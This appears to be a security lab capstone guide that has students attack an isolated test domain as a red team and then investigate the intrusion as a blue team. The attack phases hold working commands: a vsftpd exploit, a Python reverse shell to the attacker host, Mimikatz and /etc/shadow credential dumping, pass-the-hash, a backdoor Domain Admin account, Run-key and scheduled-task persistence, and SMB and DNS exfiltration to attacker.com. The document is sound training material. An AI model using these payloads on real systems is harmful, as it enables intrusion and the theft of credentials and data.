seclab/CAPSTONE_APT_Simulation.md
2026-05-28 18:27:41 -06:00
# CAPSTONE PROJECT: Operation Serpent's Shadow
## Advanced Persistent Threat (APT) Simulation & Incident Response
**Duration**: 24-30 hours
**Points**: 200 (Red Team: 100pts, Blue Team: 100pts)
**Prerequisites**: MOD0-MOD8 completion
**Difficulty**: Advanced
---
## Executive Summary
**Operation Serpent's Shadow** is a comprehensive capstone exercise simulating a sophisticated APT campaign against the Apophis Networking infrastructure. You will first act as the **Red Team** executing a 7-phase attack campaign, then switch roles to become the **Blue Team** investigating and responding to your own intrusion.
This capstone tests your ability to:
- Execute complex multi-stage attacks using techniques from MITRE ATT&CK
- Maintain operational security while achieving attack objectives
- Detect, analyze, and respond to advanced threats
- Document findings in professional incident response reports
- Apply threat intelligence to real-world scenarios
**Scenario**: A nation-state APT group (codename: SERPENT SYNDICATE) has targeted Apophis Networking to steal intellectual property and maintain persistent access. You will emulate this threat actor, then hunt and remediate the intrusion.
---
## Learning Objectives
By completing this capstone, you will demonstrate:
1. **Red Team Skills**:
- Multi-phase attack chain execution (reconnaissance → persistence)
- Evasion of security controls (IDS/IPS, EDR simulation)
- Credential harvesting and lateral movement
- Data exfiltration techniques
- OPSEC and TTPs documentation
2. **Blue Team Skills**:
- Security log analysis across multiple sources (SIEM, firewall, endpoint)
- Intrusion detection and alert triage
- Digital forensics (disk, memory, network)
- Incident response lifecycle (PICERL, the SANS six-step model that maps onto NIST SP 800-61)
- Threat intelligence correlation (MITRE ATT&CK mapping)
- Remediation and hardening recommendations
3. **Professional Skills**:
- Technical report writing
- Timeline reconstruction
- Executive briefing creation
- Post-incident review documentation
---
## Lab Environment
### Network Topology
```
VLAN 100 (Management) : 10.10.1.0/24 - Proxmox, pfSense
VLAN 200 (Red Team) : 10.10.2.0/24 - Kali Linux
VLAN 300 (Blue Team) : 10.10.3.0/24 - Security Onion
VLAN 400 (Victim Network): 10.10.4.0/24 - Target Systems
```
### Target Systems (VLAN 400)
1. **DC01** (10.10.4.10) - Windows Server 2022 Domain Controller
- Domain: `apophis.local`
- Services: AD, DNS, LDAP, Kerberos
2. **WS01** (10.10.4.20) - Windows 10 Workstation (HR Department)
- Domain-joined
- User: `hruser` (Domain Users group)
3. **WS02** (10.10.4.21) - Windows 10 Workstation (IT Admin)
- Domain-joined
- User: `itadmin` (Domain Admins group - simulated compromised admin)
4. **WEB01** (10.10.4.30) - DVWA Web Server (Ubuntu + Docker)
- Services: HTTP (80), SSH (22), MySQL (3306)
5. **FILE01** (10.10.4.40) - Metasploitable 2 (Legacy File Server)
- Services: FTP (21), SMB (445), SSH (22)
### Attack Infrastructure (VLAN 200)
- **Kali Linux** (10.10.2.50)
- Tools: Nmap, Metasploit, Impacket, BloodHound, Responder, Mimikatz
### Monitoring Infrastructure (VLAN 300)
- **Security Onion** (10.10.3.100)
- SIEM: Kibana/Elasticsearch
- IDS/IPS: Suricata
- Network Forensics: Zeek (Bro), PCAP
---
## PHASE 1: RED TEAM OPERATION (100 Points)
### Pre-Engagement Checklist
Before starting the attack campaign:
1. **Create Attack VM Snapshot**: `Kali_PreAttack_Snapshot`
2. **Create Target VM Snapshots**: Snapshot all VLAN 400 systems
3. **Verify Network Isolation**: Confirm VLAN segmentation and firewall rules
4. **Start Security Onion**: Ensure all sensors are running
5. **Create Attack Log Directory**:
```bash
mkdir -p ~/capstone/red_team/{logs,screenshots,loot,exfil}
script ~/capstone/red_team/logs/attack_$(date +%Y%m%d_%H%M%S).log
```
---
### Attack Phase 1: External Reconnaissance (10 Points)
**Objective**: Map the external attack surface without triggering alerts.
**TTPs**: MITRE ATT&CK - TA0043 (Reconnaissance)
**Tasks**:
1. **Passive Reconnaissance**:
```bash
# Simulated OSINT gathering (document in report)
echo "apophis.local" > targets.txt
echo "10.10.4.0/24" >> targets.txt
# DNS enumeration (if DNS is exposed)
dig @10.10.4.10 apophis.local ANY
dig @10.10.4.10 apophis.local AXFR
```
2. **Active Network Scanning**:
```bash
mkdir -p recon
# SYN sweep; -Pn skips ping so all 254 addresses get probed, -T2 only slows the
# rate. Suricata's ET SCAN rules still see it: note in the report what alerted.
sudo nmap -sS -Pn -T2 --max-retries 1 -oA recon/syn_scan 10.10.4.0/24
# Service enumeration only on hosts that showed open ports (far quieter than
# sweeping the whole /24 with -p-)
awk '/open/ {print $2}' recon/syn_scan.gnmap | sort -u > recon/live_hosts.txt
sudo nmap -sV -sC -p- --open -T3 -iL recon/live_hosts.txt -oA recon/service_scan
```
3. **SMB/NetBIOS Enumeration**:
```bash
# Enumerate SMB shares and users
enum4linux -a 10.10.4.10 | tee recon/enum4linux_dc01.txt
smbclient -L //10.10.4.40 -N | tee recon/smbshares_file01.txt
```
**Deliverables**:
- [ ] Nmap scan results (XML + screenshot)
- [ ] Network topology diagram with discovered hosts/services
- [ ] Target prioritization list (justify choices)
**Assessment Criteria** (10pts):
- Comprehensive service enumeration (5pts)
- Evasion techniques documented (3pts)
- Target analysis and prioritization (2pts)
---
### Attack Phase 2: Initial Access (15 Points)
**Objective**: Gain initial foothold on the victim network.
**TTPs**: MITRE ATT&CK - TA0001 (Initial Access)
**Techniques**: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts)
**Scenario**: You discovered FILE01 (Metasploitable 2) running vulnerable vsftpd 2.3.4.
**Tasks**:
1. **Exploit vsftpd Backdoor** (from MOD3):
```bash
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.4.40
set PAYLOAD cmd/unix/interact
exploit
```
2. **Stabilize the Shell** (optional Meterpreter upgrade):
```bash
# The vsftpd backdoor shell has no job control and dies if the session drops,
# so catch a second, independent reverse shell on Kali first:
nc -lvnp 4444
# Then, from the vsftpd shell on FILE01 (Metasploitable 2 ships Python 2.x):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# A real Meterpreter session needs a linux/x86 payload built with msfvenom,
# transferred to FILE01 and caught by exploit/multi/handler
```
3. **System Enumeration**:
```bash
# Gather system information
uname -a
id
cat /etc/passwd
cat /etc/shadow 2>/dev/null
netstat -tulpn
ls -la /home
```
**Deliverables**:
- [ ] Screenshot of successful exploit
- [ ] Output of system enumeration commands
- [ ] Screenshot showing `whoami` and `ifconfig` from victim
**Assessment Criteria** (15pts):
- Successful initial access (10pts)
- System enumeration completeness (3pts)
- Shell stability and upgrade (2pts)
---
### Attack Phase 3: Credential Access (15 Points)
**Objective**: Harvest credentials to enable lateral movement.
**TTPs**: MITRE ATT&CK - TA0006 (Credential Access)
**Techniques**: T1003 (OS Credential Dumping), T1110 (Brute Force)
**Tasks**:
1. **Linux Credential Harvesting** (FILE01):
```bash
# Dump /etc/shadow (if accessible)
cat /etc/shadow
# Search for credentials in config files
grep -ri password /var/www/html 2>/dev/null
grep -ri password /home 2>/dev/null
find / -name "*pass*" -type f 2>/dev/null | head -20
```
2. **Password Cracking**:
```bash
# Copy /etc/passwd and /etc/shadow from FILE01 to Kali (cat them in the shell
# and save as /tmp/passwd and /tmp/shadow), then combine and crack with John
unshadow /tmp/passwd /tmp/shadow > /tmp/unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.txt
john --show /tmp/unshadowed.txt
```
3. **Web Application Credential Extraction** (WEB01):
```bash
# SQL injection to dump DVWA users (MOD7 techniques). DVWA needs the
# security=low cookie alongside the session cookie, and the URL must be quoted
# so the shell does not treat '#' as the start of a comment.
sqlmap -u "http://10.10.4.30/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="security=low; PHPSESSID=<your-session>" \
--dump -D dvwa -T users
```
4. **Network Credential Sniffing** (Advanced):
```bash
# Responder answers LLMNR/NBT-NS/mDNS lookups to capture NetNTLM hashes. It only
# works on the victims' broadcast domain, so run it from an interface on VLAN 400
# (or from a compromised host there), not from VLAN 200. Older tutorials use
# -wrf; -f is gone in Responder 3.x, check `responder -h` for your version.
sudo responder -I eth0 -w
# Captured hashes are written under Responder's logs/ directory
```
**Deliverables**:
- [ ] Cracked password list (at least 3 accounts)
- [ ] Screenshot of John the Ripper output
- [ ] Captured NTLM hashes (if applicable)
- [ ] SQL injection dump results
**Assessment Criteria** (15pts):
- Multiple credential sources exploited (7pts)
- Successful password cracking (5pts)
- Documentation of credential storage locations (3pts)
---
### Attack Phase 4: Lateral Movement (20 Points)
**Objective**: Pivot from initial foothold to domain-joined systems.
**TTPs**: MITRE ATT&CK - TA0008 (Lateral Movement)
**Techniques**: T1021.002 (SMB/Windows Admin Shares), T1550.002 (Pass the Hash)
**Scenario**: You obtained credentials for `itadmin` and need to access WS02.
**Tasks**:
1. **SMB Authentication Testing**:
```bash
# Test the recovered password (P@ssw0rd123 stands in for whatever Phase 3 yielded)
# against every host; --local-auth retries it as a local SAM account, which
# exposes reuse between domain and local admin. Current Kali ships netexec
# (nxc) as the successor to crackmapexec with the same syntax.
crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --shares
crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --local-auth
```
2. **PSExec Lateral Movement**:
```bash
# Gain shell on WS02 using Impacket
impacket-psexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
# Alternative: WMIExec
impacket-wmiexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
```
3. **Kerberoasting Attack** (MOD5 techniques):
```bash
# Request TGS tickets for accounts with SPNs and write them in hashcat format.
# Nothing comes back unless DC01 has a service account with an SPN; if so,
# record that as a finding rather than skipping the step.
impacket-GetUserSPNs 'apophis.local/itadmin:P@ssw0rd123' -dc-ip 10.10.4.10 \
-request -outputfile tgs_tickets.txt
# Crack RC4 TGS-REP hashes (mode 13100; AES128/AES256 tickets need 19600/19700)
hashcat -m 13100 tgs_tickets.txt /usr/share/wordlists/rockyou.txt
```
4. **BloodHound Enumeration** (Advanced):
```bash
# Collect AD data
bloodhound-python -d apophis.local -u itadmin -p 'P@ssw0rd123' \
-ns 10.10.4.10 -c all
# Import into BloodHound GUI and analyze shortest path to Domain Admins
```
**Deliverables**:
- [ ] Screenshot of successful lateral movement to WS02
- [ ] CrackMapExec output showing access to multiple systems
- [ ] Kerberoast TGS tickets (if obtained)
- [ ] BloodHound attack path graph (screenshot)
**Assessment Criteria** (20pts):
- Successful lateral movement to domain system (10pts)
- Use of multiple techniques (5pts)
- Active Directory enumeration completeness (5pts)
---
### Attack Phase 5: Privilege Escalation & Persistence (20 Points)
**Objective**: Escalate to Domain Admin and establish persistent access.
**TTPs**: MITRE ATT&CK - TA0004 (Privilege Escalation), TA0003 (Persistence)
**Techniques**: T1003.001 (LSASS Memory), T1550.002 (Pass the Hash), T1136.002 (Create Account: Domain Account), T1053.005 (Scheduled Task), T1547.001 (Registry Run Keys)
**Tasks**:
1. **Mimikatz Credential Dumping** (WS02):
```powershell
# On compromised WS02 system
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
```
2. **Pass-the-Hash to Domain Controller**:
```bash
# Use an NT hash from the Mimikatz output (sekurlsa::logonpasswords or
# lsadump::sam) to reach DC01 without the cleartext password. The value after
# the colon is the 32-hex-character NT hash; the LM half is left empty.
impacket-psexec -hashes ':<NT_hash_from_mimikatz>' 'apophis.local/Administrator@10.10.4.10'
```
3. **Create Backdoor Domain Account**:
```powershell
# On DC01
net user backdoor P@ssw0rd123! /add /domain
net group "Domain Admins" backdoor /add /domain
net user backdoor /domain
```
4. **Scheduled Task Persistence** (WS02):
```powershell
# Create scheduled task for Meterpreter callback (C:\Windows\Temp\update.exe is
# the staged payload). PowerShell continues a line with a backtick, not '\'.
schtasks /create /tn "Windows Update Check" /tr "C:\Windows\Temp\update.exe" `
/sc onlogon /ru SYSTEM /f
```
5. **Registry Persistence** (Alternative):
```powershell
# Add Run key (fires at every interactive logon on WS02)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" `
/v SecurityUpdate /t REG_SZ /d "C:\Windows\Temp\update.exe" /f
```
**Deliverables**:
- [ ] Screenshot of Mimikatz credential dump
- [ ] Proof of Domain Admin access (screenshot of `whoami /groups` on DC01)
- [ ] Backdoor account creation evidence
- [ ] Persistence mechanism documentation (scheduled task/registry)
**Assessment Criteria** (20pts):
- Domain Admin privileges achieved (10pts)
- Credential dumping success (5pts)
- Persistence mechanisms installed (3pts)
- Stealth considerations documented (2pts)
---
### Attack Phase 6: Data Exfiltration (10 Points)
**Objective**: Locate and exfiltrate sensitive data.
**TTPs**: MITRE ATT&CK - TA0010 (Exfiltration)
**Techniques**: T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)
**Tasks**:
1. **Data Discovery**:
```powershell
# Search for sensitive files
Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -lt 10MB } |
Select-Object FullName, Length
# Search for "password" in plaintext files under user profiles. findstr cannot
# see inside .docx/.xlsx (they are zip containers); open those separately.
findstr /si "password" C:\Users\*.txt C:\Users\*.ini C:\Users\*.xml
```
2. **Exfiltration over SMB** (T1048, alternative protocol):
```bash
# On Kali: stand up a writable share to receive the archive. Note that
# python3 -m http.server only answers GET and certutil -urlcache only downloads,
# so that pair moves files INTO the victim (tool transfer), not out of it.
impacket-smbserver exfil ~/capstone/red_team/exfil -smb2support
```
```powershell
# On victim: push the archive to the attacker's share
copy C:\Windows\Temp\exfil.zip \\10.10.2.50\exfil\
```
3. **DNS Exfiltration** (Stealth technique):
```powershell
# Encode data in DNS queries (simulate). Base64 contains '+', '/' and '=', which
# are not valid hostname characters, so use hex (or base32) and keep each label
# at 63 characters or fewer. On Kali, watch with: sudo tcpdump -i eth0 -n udp port 53
$bytes = [System.Text.Encoding]::UTF8.GetBytes("SECRET_DATA")
$hex = ($bytes | ForEach-Object { $_.ToString("x2") }) -join ""
nslookup "$hex.attacker.com" 10.10.2.50
```
4. **Simulate Intellectual Property Theft**:
```powershell
# Create fake sensitive document on DC01 (the share path is made up for this lab)
New-Item -ItemType Directory -Path C:\Shares\Research -Force | Out-Null
"Apophis Networking - Proprietary Research Data" | Set-Content C:\Shares\Research\IP_Data.txt
# Compress and exfiltrate
Compress-Archive -Path C:\Shares\Research\* -DestinationPath C:\Windows\Temp\exfil.zip
# Transfer with the SMB copy above, or Meterpreter's 'download' if you have a session
```
**Deliverables**:
- [ ] List of discovered sensitive files (screenshot)
- [ ] Screenshot of successful exfiltration
- [ ] Network capture showing exfiltration traffic (PCAP)
- [ ] Exfiltrated file samples (in `~/capstone/red_team/exfil/`)
**Assessment Criteria** (10pts):
- Data discovery methodology (4pts)
- Successful exfiltration (4pts)
- Stealth techniques used (2pts)
---
### Attack Phase 7: Red Team Reporting (10 Points)
**Objective**: Document the attack chain for Blue Team analysis.
**Tasks**:
1. **Create Attack Timeline**:
- Document each phase with timestamps
- Include all commands executed
- Note which actions likely triggered alerts
2. **MITRE ATT&CK Mapping**:
- Map each technique to ATT&CK framework
- Create coverage matrix (Tactics vs Techniques)
- Export for dashboard integration
3. **Indicators of Compromise (IOCs)**:
- File paths created: `C:\Windows\Temp\update.exe`
- Registry keys modified: `HKLM\...\Run\SecurityUpdate`
- Network connections: `10.10.2.50:4444` (Meterpreter)
- User accounts created: `backdoor`
- Scheduled tasks: `Windows Update Check`
4. **Red Team Report Structure**:
```markdown
# Red Team Report: Operation Serpent's Shadow
## Executive Summary
- Attack duration: X hours
- Systems compromised: 5/5 (100%)
- Privileges gained: Domain Admin
- Data exfiltrated: XX MB
## Attack Chain
[Phase 1] External Recon → [Phase 2] Initial Access (FILE01) →
[Phase 3] Credential Harvesting → [Phase 4] Lateral Movement (WS02) →
[Phase 5] Domain Admin (DC01) + Persistence → [Phase 6] Data Exfiltration
## Techniques Used
[MITRE ATT&CK mapping table]
## Indicators of Compromise
[IOC list]
## Detection Gaps Identified
[Where Blue Team should have caught you]
```
**Deliverables**:
- [ ] Complete Red Team report (PDF format)
- [ ] MITRE ATT&CK Navigator JSON file
- [ ] IOC list (CSV format)
- [ ] Complete command log from `script` session
**Assessment Criteria** (10pts):
- Report completeness and professionalism (5pts)
- Accurate MITRE ATT&CK mapping (3pts)
- Comprehensive IOC documentation (2pts)
---
## PHASE 2: BLUE TEAM OPERATION (100 Points)
### Pre-Investigation Checklist
Before starting the Blue Team phase:
1. **Preserve Evidence**:
- Create forensic snapshots of all compromised VMs
- Copy Security Onion logs: `/nsm/sensor_data/`
- Export SIEM data from Kibana (last 24 hours)
2. **Establish Blue Team Workspace**:
```bash
mkdir -p ~/capstone/blue_team/{forensics,pcaps,logs,reports,timeline}
script ~/capstone/blue_team/logs/investigation_$(date +%Y%m%d_%H%M%S).log
```
3. **Review Red Team Report** (IOCs only - not methodology yet):
- Extract IOC list to use as detection baseline
- Do NOT review attack methodology - simulate real-world blind investigation
---
### Investigation Phase 1: Detection & Triage (15 Points)
**Objective**: Identify security alerts and determine scope of compromise.
**Tasks**:
1. **SIEM Alert Review** (Security Onion Kibana):
```kql
# Kibana KQL is a filter language; it has no "| stats" (that is Splunk SPL).
# Get the counts by choosing "Visualize" on a field in Discover or with a Lens
# table over rule.name / source.ip / destination.ip. Field names follow Security
# Onion's ECS mapping; confirm them in Discover before building on them.
# High severity alerts in last 24 hours (set the time picker to 24h)
event.severity_label: (high OR critical)
# Suspicious network connections to VLAN 200
destination.ip: 10.10.2.0/24 AND event.category: network
# Authentication anomalies
event.category: authentication AND event.outcome: failure
```
2. **Suricata Alert Analysis**:
```bash
# Review IDS alerts (paths vary by version: Security Onion 2.x keeps Suricata
# output under /nsm/suricata/, a stock install under /var/log/suricata/)
sudo grep -E "ET (SCAN|EXPLOIT|MALWARE|TROJAN)" /var/log/suricata/fast.log
# Count unique alert signatures; filter on event_type so flow/dns/http records
# do not produce null lines
jq -r 'select(.event_type=="alert") | .alert.signature' /var/log/suricata/eve.json | sort | uniq -c | sort -rn
```
3. **Zeek Log Analysis**:
```bash
# Identify unusual connections (top talker tuples); victim -> 10.10.2.x is the tell
zeek-cut id.orig_h id.resp_h id.resp_p proto < /nsm/zeek/logs/current/conn.log |
sort | uniq -c | sort -rn | head -20
# DNS queries outside the domain (long hex/base32 labels suggest tunnelling)
zeek-cut -d ts id.orig_h query answers < /nsm/zeek/logs/current/dns.log | grep -v "\.local"
```
4. **Initial Hypothesis**:
- Document which systems appear compromised
- Identify likely attack entry point
- Estimate timeline of initial compromise
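The following is an added example, not part of the original capstone text: a small Python triage script that does offline what the Kibana, Suricata and Zeek steps above do interactively. The field names are the real Suricata eve.json and Zeek conn.log ones; the sample rows, signature names and byte counts are constructed for the example. Point `parse_eve` and `parse_conn_log` at the files named above to run it on real data.

```python
"""Triage helpers: Suricata eve.json alerts + Zeek conn.log, analysed offline."""
import ipaddress
import json
from collections import Counter

# Constructed sample records (shape matches real eve.json; values are made up)
EVE_JSON = """\
{"timestamp":"2026-02-10T14:23:05.000000-0600","event_type":"alert","src_ip":"10.10.2.50","dest_ip":"10.10.4.40","dest_port":21,"alert":{"signature":"ET SCAN Nmap Scripting Engine User-Agent Detected","severity":2}}
{"timestamp":"2026-02-10T14:23:06.000000-0600","event_type":"flow","src_ip":"10.10.4.20","dest_ip":"10.10.4.10","dest_port":53}
{"timestamp":"2026-02-10T14:45:12.000000-0600","event_type":"alert","src_ip":"10.10.2.50","dest_ip":"10.10.4.40","dest_port":21,"alert":{"signature":"ET EXPLOIT vsftpd 2.3.4 Backdoor Trigger","severity":1}}
{"timestamp":"2026-02-10T14:45:13.000000-0600","event_type":"alert","src_ip":"10.10.2.50","dest_ip":"10.10.4.40","dest_port":21,"alert":{"signature":"ET EXPLOIT vsftpd 2.3.4 Backdoor Trigger","severity":1}}
{"timestamp":"2026-02-10T14:46:00.000000-0600","event_type":"alert","src_ip":"10.10.4.40","dest_ip":"10.10.2.50","dest_port":4444,"alert":{"signature":"ET MALWARE Metasploit Reverse Shell Callback","severity":1}}
"""

# Constructed Zeek conn.log excerpt (tab-separated, columns named by #fields)
CONN_LOG = """\
#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\torig_bytes\tresp_bytes
1770756185.000000\tC1\t10.10.2.50\t51000\t10.10.4.40\t21\ttcp\t120\t340
1770756312.000000\tC2\t10.10.4.40\t43210\t10.10.2.50\t4444\ttcp\t5120\t880
1770757000.000000\tC3\t10.10.4.20\t50010\t10.10.4.10\t445\ttcp\t900\t1200
1770760000.000000\tC4\t10.10.4.21\t50020\t10.10.2.50\t445\ttcp\t1048576\t4096
"""

VICTIM_NET = ipaddress.ip_network("10.10.4.0/24")
ATTACKER_NET = ipaddress.ip_network("10.10.2.0/24")


def parse_eve(text):
    """Return only the alert records; flow/dns/http rows have no .alert block."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            if rec.get("event_type") == "alert":
                alerts.append(rec)
    return alerts


def top_signatures(alerts, n=10):
    """Alert counts by signature, highest first: the 'top alerts' deliverable."""
    return Counter(a["alert"]["signature"] for a in alerts).most_common(n)


def first_seen(alerts, host):
    """Earliest alert touching a host: lower bound for 'when was it first hit'."""
    times = sorted(a["timestamp"] for a in alerts if host in (a["src_ip"], a["dest_ip"]))
    return times[0] if times else None


def parse_conn_log(text):
    """Parse a Zeek conn.log, taking column names from its #fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.strip() and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def victim_to_attacker(conns):
    """Flows initiated from the victim VLAN toward the red-team VLAN: C2
    callbacks, pivots or exfil. Largest outbound byte count first."""
    hits = []
    for c in conns:
        src, dst = ipaddress.ip_address(c["id.orig_h"]), ipaddress.ip_address(c["id.resp_h"])
        if src in VICTIM_NET and dst in ATTACKER_NET:
            hits.append({"src": str(src), "dst": str(dst), "port": int(c["id.resp_p"]),
                         "orig_bytes": int(c["orig_bytes"]), "uid": c["uid"]})
    return sorted(hits, key=lambda h: h["orig_bytes"], reverse=True)


def connection_matrix(conns):
    """(source, destination, port) -> count, for the connection-matrix deliverable."""
    return Counter((c["id.orig_h"], c["id.resp_h"], c["id.resp_p"]) for c in conns)


if __name__ == "__main__":
    alerts = parse_eve(EVE_JSON)
    for sig, n in top_signatures(alerts):
        print(f"{n:4d}  {sig}")
    print("FILE01 first seen:", first_seen(alerts, "10.10.4.40"))
    for h in victim_to_attacker(parse_conn_log(CONN_LOG)):
        print(h)
```

`victim_to_attacker` is the single most useful filter in this lab: nothing in VLAN 400 has a legitimate reason to open a connection into VLAN 200, so every row it returns is either the reverse shell, a pivot or the exfil transfer, and the byte count tells you which.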
**Deliverables**:
- [ ] Top 10 critical alerts (screenshot)
- [ ] Network connection matrix (source → dest mapping)
- [ ] Initial incident triage report (1-2 pages)
**Assessment Criteria** (15pts):
- Alert prioritization and triage (7pts)
- Correct identification of compromised systems (5pts)
- Timeline accuracy (3pts)
---
### Investigation Phase 2: Network Forensics (15 Points)
**Objective**: Analyze network traffic to reconstruct attack activities.
**Tasks**:
1. **PCAP Analysis** (Wireshark):
```bash
# Export suspicious traffic from Security Onion. tcpdump -r reads one file, so
# merge the daily captures first (mergecap ships with Wireshark). On Security
# Onion 2.x full PCAP is kept by Stenographer under /nsm/pcap/ and is normally
# retrieved through the SOC web UI's PCAP page rather than read from disk.
mergecap -w /tmp/all.pcap /nsm/sensor_data/securityonion-eth1/dailylogs/*.pcap
sudo tcpdump -r /tmp/all.pcap 'host 10.10.2.50 or host 10.10.4.40' \
-w ~/capstone/blue_team/pcaps/attack_traffic.pcap
```
2. **Identify C2 Communication**:
- Filter for connections to Kali (10.10.2.50)
- Look for Meterpreter beacons (TCP 4444, HTTP reverse shells)
- Identify exfiltration channels
3. **Extract Artifacts from PCAP**:
```bash
# Export HTTP objects (potential exfil data)
tshark -r attack_traffic.pcap -q --export-objects http,/tmp/http_objects/
# SMB2 file opens: filenames are in CREATE requests (command 5), not WRITE
# (command 9). A psexec-style service binary shows up as a CREATE on ADMIN$.
tshark -r attack_traffic.pcap -Y "smb2.cmd == 5 && smb2.filename" -T fields \
-e frame.time -e ip.src -e ip.dst -e smb2.filename
```
4. **Protocol Analysis**:
- Document SMB sessions (lateral movement)
- Kerberos TGT/TGS requests (Kerberoasting)
- DNS queries (potential DNS tunneling)
- HTTP POST requests (data exfiltration)
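Added example, not from the original lab, serving both Attack Phase 6's DNS exfiltration step and the DNS-tunnelling check in this phase: the encoder turns a payload into hostname-safe query names the way a tunnelling tool does, and the detector flags the resulting pattern in a constructed Zeek dns.log. The domain attacker.com, the sample rows and the thresholds are assumptions to tune against your own logs.

```python
"""DNS exfiltration: red-side encoding and blue-side detection over dns.log."""
import base64
import math
from collections import Counter, defaultdict

MAX_LABEL = 63    # RFC 1035 label limit
MAX_NAME = 253    # practical limit for a full name
SECRET = b"Apophis Networking - Proprietary Research Data\n" * 8   # constructed payload


def encode_for_dns(data, domain, labels_per_name=1):
    """Red side: base32 (hostname-safe, unlike base64) cut into <=63-char labels,
    prefixed with a sequence number so the receiver can reorder and drop retries."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names = []
    for seq, i in enumerate(range(0, len(labels), labels_per_name)):
        name = ".".join([str(seq), *labels[i:i + labels_per_name], domain])
        if len(name) > MAX_NAME:
            raise ValueError("too many labels per name")
        names.append(name)
    return names


def decode_from_dns(names, domain):
    """Receiver side: what the attacker's authoritative server reconstructs."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if name.endswith(suffix):
            seq, *labels = name[:-len(suffix)].split(".")
            chunks[int(seq)] = "".join(labels)
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(s):
    counts = Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def parse_dns_log(text):
    """Zeek dns.log parser; column names come from the #fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def suspicious_domains(rows, min_queries=5, min_label=30, min_entropy=3.0):
    """Blue side: group by the last two labels and flag domains that receive many
    queries whose subdomain labels are long and high-entropy. Thresholds are
    starting points; tune them against a day of known-good dns.log."""
    per_domain = defaultdict(list)
    for r in rows:
        labels = r["query"].rstrip(".").split(".")
        if len(labels) >= 3:
            per_domain[".".join(labels[-2:])].append(labels[:-2])
    flagged = {}
    for dom, queries in per_domain.items():
        blob = "".join(x for labels in queries for x in labels)
        longest = max(len(x) for labels in queries for x in labels)
        ent = shannon_entropy(blob)
        if len(queries) >= min_queries and longest >= min_label and ent >= min_entropy:
            flagged[dom] = {"queries": len(queries), "longest_label": longest, "entropy": round(ent, 2)}
    return flagged


def build_sample_dns_log():
    """Constructed dns.log: three benign lab lookups plus the tunnel queries."""
    rows = [("1770760000.000000", "10.10.4.20", "dc01.apophis.local"),
            ("1770760001.000000", "10.10.4.20", "wpad.apophis.local"),
            ("1770760002.000000", "10.10.4.21", "www.microsoft.com")]
    rows += [(f"17707610{i:02d}.000000", "10.10.4.10", n)
             for i, n in enumerate(encode_for_dns(SECRET, "attacker.com"))]
    return "#fields\tts\tid.orig_h\tquery\n" + "".join(f"{t}\t{s}\t{q}\n" for t, s, q in rows)


if __name__ == "__main__":
    names = encode_for_dns(SECRET, "attacker.com")
    print(f"{len(names)} queries, e.g. {names[0]}")
    print(suspicious_domains(parse_dns_log(build_sample_dns_log())))
```

Why both halves matter for the report: the encoder shows why the exfil is noisy (a few hundred bytes cost ten queries, each with a 63-character label that nothing legitimate on this network produces), and the detector is the Zeek-side check that turns that observation into a finding.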
**Deliverables**:
- [ ] Annotated PCAP with attack traffic highlighted
- [ ] Screenshot of C2 communication in Wireshark
- [ ] Extracted artifacts (HTTP objects, SMB files)
- [ ] Network forensics report (protocol breakdown)
**Assessment Criteria** (15pts):
- Correct identification of attack traffic (7pts)
- C2 channel analysis (5pts)
- Artifact extraction completeness (3pts)
---
### Investigation Phase 3: Host Forensics (20 Points)
**Objective**: Perform disk and memory forensics on compromised systems.
**Tasks**:
1. **Disk Forensics with Autopsy** (FILE01 - Initial Access Point):
```bash
# Image the disk from outside the guest. Running dd inside a live, compromised
# FILE01 alters the evidence and trusts the attacker's shell. Power off (or
# snapshot) the VM, convert its disk on the Proxmox host, then hash the image.
# (Storage path and disk name are the Proxmox defaults; adjust to your setup.)
qemu-img convert -O raw /var/lib/vz/images/<vmid>/vm-<vmid>-disk-0.qcow2 file01.dd
sha256sum file01.dd | tee file01.dd.sha256
# Import into Autopsy and analyze:
# - Timeline of file modifications
# - Deleted files recovery
# - Web history / bash history (/root/.bash_history, /home/*/.bash_history)
# - Malware artifacts
```
2. **Memory Forensics with Volatility** (WS02 - Lateral Movement Target):
```bash
# Capture memory BEFORE powering off: from the Proxmox host (qm monitor <vmid>,
# then dump-guest-memory) or inside the guest with winpmem / FTK Imager
# Analyze with Volatility 3
python3 vol.py -f ws02_memory.raw windows.info
python3 vol.py -f ws02_memory.raw windows.pslist
python3 vol.py -f ws02_memory.raw windows.cmdline
python3 vol.py -f ws02_memory.raw windows.netscan
python3 vol.py -f ws02_memory.raw windows.malfind
